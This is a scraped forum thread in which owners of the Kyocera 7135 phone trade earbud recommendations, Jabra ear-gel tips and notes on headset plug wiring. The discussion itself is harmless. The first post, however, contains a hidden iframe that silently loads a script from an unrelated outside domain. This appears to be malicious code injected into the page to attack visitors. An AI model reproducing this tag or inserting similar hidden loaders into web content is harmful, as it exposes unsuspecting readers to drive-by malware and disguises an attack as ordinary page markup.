+ Reply to Thread
Page 1 of 3 1 2 3 LastLast

Best Earbud for the 7135?

Now that some of are finally getting our 7135's, anyone have any favorite earbuds out there to go with this high tech device?

Please list your favorite earbud and why? Wireless?

My 7135 comes in hopefully Friday and I am shopping around...:alieneyes<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Live long and prosper...

I use the Kyo earbuds. The sound is fine, but as others have reported, they don't stay in the ears well. The problem with getting a replacement is that the jack for the headphones is very different than a standard jack. It is smaller and accomodates the MP3 playback as well as the phone. Standard headphones will not fit.

I also use the Kyo stereo ear bud... after finding that they didn't stay in well and were uncomfortable, I attached some Jabra Ear Gels to them and they are great now...

http://www.jabra.com (they are actually down the street from Kyocera Wireless in San Diego... three blocks away)

AJaM

Jabra...

The problem I have had with the kyo ear bud is it does not stay well in my ear...I will look into the Jabra solution...Thanks! Guess I have a big ear hole...
    Live long and prosper...

jabra

Jabra has several sizes for their ear gels... they also have right and left sides!

AJaM

How does it work

How do you apply the ear gel, is it a moldable earbud?
    Live long and prosper...

The ones I have went over any round ear bud.

AJaM

Originally posted by AJaM
    I also use the Kyo stereo ear bud... after finding that they didn't stay in well and were uncomfortable, I attached some Jabra Ear Gels to them and they are great now...

http://www.jabra.com (they are actually down the street from Kyocera Wireless in San Diego... three blocks away)

AJaM
    I just went to their web site and ordered them. Thanks!

The Jabra Free Speak is great too... Now that I know it works with our phones

Coolcat is making a modified stereo headset for me, replacing the Kyo earbuds with Koss hook-over-the-ear pads.

You'd think that there would be someone out there that would make a stereo headset with mic for these new phones...

Oh wait no the KW is the only one like it out there...

HA

Jabra eargels work great on the OEM stereo headset. I used the left medium size for my phone headset, and found that the small size that would have been "leftovers" worked great to replace the foam pads on my Kyo stereo earbuds. I haven't used the mic on the stereo headset yet, and it seems to dangle further from the mouth compared to other headsets I've used. Anyone have any experience?
    :devillook TopCat :devillook

I've used the mic once, and specificly asked how I sounded, no complaints when using it.
    Dan

You'd think that there would be someone out there that would make a stereo headset with mic for these new phones...

Oh wait no the KW is the only one like it out there...

HA
    lol :p
    Please visit my picture site: Robert-O-Rama :)

I did see a Jabra phone earpiece with the 3 rings on the plug which MIGHT indicate it could take both music and phone but I was not prepared to pay $12+ to find out, specially since it was only for one ear(no stereo). I wonder if the 7135 would accept a Bluetooth SD card. In any case, the Bluetooth earpiece is too large and ugly for me. I really don't care for earplugs in general and specially all these wires dangling. As has been said, wish someone would manufacture a nice headpiece.

John
    John R.

Hey guys!

If you're longing for a full fledged stereo headset for your 7135 other than Kyocera's, you needn't wait long!

I'm currently working on just such a beast. You'll be able to choose the type of earphone that you want too! Want high-end earbuds? No problem! Want big honkin' earmuffs? I'll do that too! Of course, the price will depend on the type of earpieces that you choose, but each set will plug right into your 7135 and work as Kyocera intended, only with much better sound!
    Sorry, but I no longer make 7135 headset adapters.

You'd need four rings... Right, Left, Mic, and Ground

AJaM

You'd need four rings... Right, Left, Mic, and Ground

AJaM

Actually, any mono headset will work on the 7135, though you'll get no right channel through it (of course).

If you want stereo, and you don't want the Kyocera headset, then I'm your man!
    Sorry, but I no longer make 7135 headset adapters.

Sorry coolcat... this was for the previous post... refering to stereo headset with mic....

AJaM

Im happy to learn that a headphone for the Kyocera will be available. As for the rings on the plug I am sorry if there was any confusion. In the past when I had mono headsets the plug had a single black ring around the plug. Stereo plugs have two rings and the Kyocera plug has three green rings circling the plug. I am unfamiliar with a 4-ring plug. However that seems unimportant. If Im mistaken in some way I apologize. Please let us all know when the headphones are available.
    John R.